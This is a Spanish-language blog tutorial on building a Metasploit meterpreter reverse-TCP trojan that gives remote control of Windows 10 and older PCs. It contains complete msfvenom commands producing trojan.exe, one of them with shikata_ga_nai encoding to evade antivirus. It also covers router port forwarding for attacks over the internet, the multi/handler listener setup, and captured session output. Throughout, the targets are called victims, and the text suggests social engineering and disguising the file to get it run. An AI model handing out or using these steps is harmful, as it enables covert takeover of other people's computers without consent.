Accediendo remotamente a Windows 10 con Metasploit

Win 10

Microsoft afirma que Windows 10 ha corregido todas las vulnerabilidades de seguridad. Ya no podemos "hackear" una PC de Windows con un exploit remoto como "ms08_067_netapi". Windows ha solucionado esa vulnerabilidad. Entonces, ¿cómo podemos hackear una PC de Windows? ¿es posible ahora? La respuesta es sí, las máquinas de Windows siguen siendo vulnerables a los ataques de troyanos independientemente de las versiones. Con este método puedes "hackear" cualquier máquina con Windows 10,8.1,8,7, vista y XP.

Un troyano o puerta trasera puede dar acceso a la máquina de destino de forma remota. Todos lo sabemos, no profundizaremos en explicar qué es un troyano. Aquí vamos a usar el troyano reverse_tcp de metasploit. Este es un malware especialmente diseñado que establece una conexión remota a la máquina del cracker a través del protocolo de control de transición desde la máquina víctima. Esto le permite al cracker penetrar en la máquina y tomar el control total sobre ella.

Metasploit framework es una de las mejores herramientas actuales para realizar pruebas de penetración. Tiene controlador y generador de payloads. Una vez que el payload se ejecuta en la máquina de destino mientras estamos en el modo de escucha en la sección de handler, genera una shell de meterpreter. Este shell nos permite comunicarnos con el sistema de destino y ejecutar comandos de shell. Comparado con el shell normal, tiene muchas opciones. Esto se puede hacer mientras el objetivo está en la misma red LAN o en Internet, no hay diferencia, solo tiene que configurar el router/modem y el payload en consecuencia. Este proceso es muy simple. Sigue los pasos.

Video demostrativo.

 

A partir de este momento nosotros asumimos que usted tiene Metasploit instalado en su sistema operativo.

Configuración del módem.

Este paso es muy importante cuando su objetivo es a través de Internet o WAN. Ignore este paso si su objetivo está en la misma red. Para "hackear" una PC a través de Internet significa que tiene que comunicarse en ambas direcciones. Para hacer esto, su enrutador/módem debería abrir un puerto de su máquina. Esto se llama reenvío de puertos. Por defecto, todos los puertos están cerrados por su enrutador/módem. Abra un navegador vaya a url http://192.168.0.1 Escriba su nombre de usuario y contraseña. Esto lo llevará a la configuración del enrutador. Vaya a Configuración avanzada o a firewall para encontrar el reenvío de puertos (Port Forwarding). Ahora haga clic en agregar nuevo establecer el puerto de inicio y final en 444 (ya que estamos usando el puerto 444 en metasploit). En el campo de dirección IP, debe escribir la IP interna de su máquina GNU/Linux y guardamos los ajustes. Si requiere parámetros especiales cómo Protocolo, usa UDP.

Generación del exploit.

Para generar el exploit basta con ejecutar el siguiente comando en su consola GNU/Linux:

msfvenom -p windows/meterpreter/reverse_tcp   --platform windows -a x86 -f exe LHOST=192.168.0.6 LPORT=444 -o $HOME/trojan.exe

Si desea hacer que su exploit sea más dificil de detectar para los antivirus, puede usar por ejemplo:

msfvenom -p windows/meterpreter/reverse_tcp  -e x86/shikata_ga_nai -b '\x00' -i 10 --platform windows -a x86 -f exe LHOST=192.168.0.6 LPORT=444 -o /home/sechacklabs/Desktop/trojan.exe

Si deseas conocer más a fondo sobre metasploit sigue este enlace. Con eso, se habrá generado un exploit de nombre trojan.exe en tu directorio HOME.

Interacción con Metasploit.

Una vez generado el exploit realizaremos los siguientes pasos, cuando hayamos terminado debemos buscar la manera de que se ejecute en el sistema de la victima, para lograrlo puedes usar técnicas cómo ingeniería social. No se recomienda enviar el exploit tal cual, hay que camuflarlo, añadirle encoders entre otras cosas.

Abrimos la consola de metasploit.

sudo msfconsole

Usamos Handler

msf> use multi/handler

Configuramos el Payload.

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

Configuramos el puerto local.

msf exploit(handler) > set LPORT 444

Configuramos la ip local.

msf exploit(handler) > set LHOST "Nuestra IP local"

Ejecutamos el exploit.

msf exploit(handler) > exploit

Payload ejecutado.

Una vez que la víctima haya ejecutado nuestro archivo malicioso obtendremos una sesión de meterpreter cómo se puede ver a continuación.

msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.0.6:444 
[*] Sending stage (179779 bytes) to 192.168.0.9
[*] Meterpreter session 1 opened (192.168.0.6:444 -> 192.168.0.9:50328) at 2018-05-18 12:00:25 -0500

meterpreter > sysinfo
Computer        : DESKTOP-2MRF5DJ
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : es_ES
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows

El proceso es sencillo, la parte complicada es hacer ejecutar el payload en la máquina de la víctima, más adelante explicaremos las mejores técnicas para lograrlo e incluso cómo se puede lograr aprovechando vulnerabilidades cómo Microsoft Office DDEAUTO.

Síguenos en FacebookTwitterunete a nuestra charla en Riotúnete a IRC o únete a Telegram y no olvides compartirnos en las redes sociales. También puede hacernos una donación o comprar nuestros servicios.

Acerca del autor

Especialista en Seguridad Informática bajo certificación OSCP, experto en técnicas de privacidad y seguridad en la red, desarrollador back-end, miembro de la FSF y Fundador de Security Hack Labs. Desarrollador de la distribución de hacking BlackArch Linux. Twitter: @edu4rdshl XMPP/Email: [email protected]